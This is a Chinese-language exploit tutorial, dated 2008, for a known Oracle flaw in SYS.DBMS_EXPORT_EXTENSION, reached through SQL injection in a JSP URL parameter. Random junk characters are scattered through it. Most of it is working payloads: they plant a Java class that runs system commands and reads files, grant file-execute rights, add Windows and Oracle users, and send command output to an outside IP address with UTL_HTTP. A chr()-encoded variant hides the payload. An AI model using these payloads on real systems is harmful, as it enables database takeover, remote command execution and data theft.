以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 0 t/ [, f. C7 t0 H2 n; ]. h+ ?% `
. B9 P6 R: k- G/ k% z$ K& M% T6 w /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
; I/ r! F, W* s: w2 B' ]的形式即可。(用" 'a'|| "是为了让语句返回true值) , a$ v: ~1 u2 P8 x- s7 @1 N4 F2 r; c
语句有点长,可能要用post提交。
) v& b# }3 h" h) p以下是各个步骤:
. X- }$ n% c0 _) k! ~; [1.创建包 ! k6 B/ n' e1 |- \( `: T+ A0 W
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:* I8 z6 F6 o& m+ ]
/xxx.jsp?id=1 and '1'<>'a'||(
" k: g6 L; M+ A$ T N) e8 Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 f6 T# \! \: Z. k- \# {
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
9 ~4 T3 n( B) a$ s" h. c8 V; |new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
- G* p: d* e6 ?6 C- v" J$ \}'''';END;'';END;--','SYS',0,'1',0) from dual ; x4 E3 S# ?8 D" J2 {
) 4 B% L) \4 z$ ~4 |$ e& T8 H8 E
------------------------
4 O7 p+ v8 D# V) H w% h- P如果url有长度限制,可以把readFile()函数块去掉,即: 1 G9 Q4 r, v! w7 w5 w" ?
/xxx.jsp?id=1 and '1'<>'a'||( ' p) U; L( {5 j% b1 V4 l: G3 W @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ J( m6 L4 Z( m* U9 M; ~$ O9 l+ zcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
$ ]& J6 b- S% A, k2 L. \+ J' t+ ~new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}! M" X2 T- V0 Q2 w( r" Z0 S+ G
}'''';END;'';END;--','SYS',0,'1',0) from dual 9 W2 `0 b8 z! J( ^/ i
)
& T5 u5 G* j7 J$ n同时把后面步骤 提到的 对readFile()的处理语句去掉。
' n$ n. [9 J+ |8 `" x/ u3 i- B------------------------------ ) y5 `/ H9 `7 i" O
2.赋Java权限
j+ v" V2 Z' H3 G1 e4 h# j* {) fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual+ b- M/ ~* k1 z9 N" A2 Z# j
3.创建函数
) F9 B1 Q O4 ]* C- E8 `: Jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' [$ H3 `. }) F* Q/ V" {5 n* l+ {$ R G4 q
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual0 T1 B0 i# W5 t7 Q0 R: e, c4 Q" L
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: f0 ]$ g: S* @) icreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
. K/ Z$ o. f0 V" l4.赋public执行函数的权限 3 y6 c! J/ q# ~4 y4 S6 R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
9 L5 {3 g. S: l2 }" gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual8 E, c* w, ~* P) A3 U
5.测试上面的几步是否成功
`# v* J8 @0 u+ l) M- Oand '1'<>'11'||(
& _0 A1 i9 L# i0 G8 f% z. U% Nselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD' 0 M5 G# k9 D4 h" v n! m
) 0 s& G/ ]2 x# c1 {; T/ @* E
and '1'<>( ! M, F8 `8 a( S3 T7 b
select OBJECT_ID from all_objects where object_name ='LINXREADFILE' - J/ u, r3 E8 a" j2 [+ c9 w/ n
) 6 e' s `7 M- z* V, Q
6.执行命令:
! }# x: w+ K k2 D N7 b2 e/xxx.jsp?id=1 and '1'<>(
/ N' G& _# E/ Iselect sys.LinxRunCMD('cmd /c net user linx /add') from dual 1 J, c5 Y' |) H
0 C/ n) g4 k3 } c
)
: ` c) }- N2 ?8 t) N- |0 c5 }/xxx.jsp?id=1 and '1'<>( 3 K4 v- E0 ~' H4 I" u4 u5 u
select sys.LinxReadFile('c:/boot.ini') from dual
5 `. }* s0 E0 N p" w% [5 v: j
2 u. p4 j3 g' n4 F) f2 O)
8 \! x4 \: K7 k Q+ s. l' [
8 ?! P/ c9 q- u/ r* U+ l注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
1 q# T$ B* V2 d! |$ I) S如果要查看运行结果可以用 union :
! N5 i7 D8 ~; ~4 ~' K" h. l, t/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual9 W' o9 n Y8 o( y0 P& }
或者UTL_HTTP.request(: * X* i5 v0 S" O; c$ ~* U. ~. i
/xxx.jsp?id=1 and '1'<>( ; t* h4 J- L% ]: d7 N8 m- u i
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual: `) }0 Q& M. f4 S9 z
)
+ Y2 I5 G6 j+ @( R. `/xxx.jsp?id=1 and '1'<>( " M4 N8 Z" ]) l. x# ~+ G
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual6 Y S- |4 @- ^7 S; K" \; r! g1 n6 Z
) ; \4 z2 j0 U8 i% F h( _ h' j2 H' L
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。( y7 O( d1 x5 R: h1 z
--------------------
! G* I4 D8 [) r S" c( |6.内部变化
# @) x7 K- }' K3 r2 e3 Q通过以下命令可以查看all_objects表达改变: ; J$ {4 [' z: X/ h2 U5 G) I0 b; x& @
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'" a1 t: V- B/ y1 {& S5 X
7.删除我们创建的函数
, f; m+ ?5 ~" Y: U' |select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 Q; N6 y# e6 ]/ e& C+ Q- t
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual / i! \; C( C# x& L% V3 A
====================================================
8 a0 N/ b5 w) G; f0 n- w7 S( s& w全文结束。谨以此文赠与我的朋友。 7 M" ]5 t! }$ y2 r$ z
linx
+ c4 O. Y. G; o& Q9 A F% L124829445
6 R0 O, o: U# [2 u2008.1.12 & ~; f/ u! D: b) E
linyujian@bjfu.edu.cn
/ ]2 o4 c, H ?6 U======================================================================
# C' i( E! u$ v" e) ^1 g( j测试漏洞的另一方法:
1 s1 `( S: g* Q3 M7 P创建oracle帐号: " t$ b& w- l7 \
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ W5 a. p5 @# {, F. }, J+ nCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
( h9 _' u4 b h+ F即: : v" J: Q$ Y+ X3 T$ J
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82), C; ?6 S" [3 F S# P9 ^
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual $ z; G# U+ k, Y
确定漏洞存在: ! p2 B( u! v% H' J; W. F7 e' y; L
1<>( ( ]7 w+ W7 L1 ^% Y$ u
select user_id from all_users where username='LINXSQL' 5 q3 ?& K# b' c. A7 i2 v
) " F3 z( X1 s0 y( Q5 P
给linxsql连接权限: ; C5 u' i6 t: h0 C+ P
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 W3 g5 t4 t( I5 L6 Q% U0 [) YGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
- |, I+ g# F+ Q W% l% |删除帐号:
/ u+ W W @: T0 O& Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 u6 c( F" ]. z# R3 V* ]9 @
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
2 v! f7 c4 M" i; H! }( Y======================
+ M$ t4 E# j) k: ]以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
- T i* h- x' \+ @* T3 o& z% e1.jsp?id=1 and '1'<>(
6 i" @' X# s* v! Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% W9 M- s8 l% m
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual6 E# t' w1 T, W) X4 w/ R# Q9 ~$ e' [# U
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
2 I! X$ ?1 b3 D8 E2 n )( \0 l! Y8 Z) e% k6 U
8 c/ y+ W$ u. Y6 [1 _% q, S! I* |) v6 j) ?" S( P
' K; a, s, Y5 h5 \+ E
|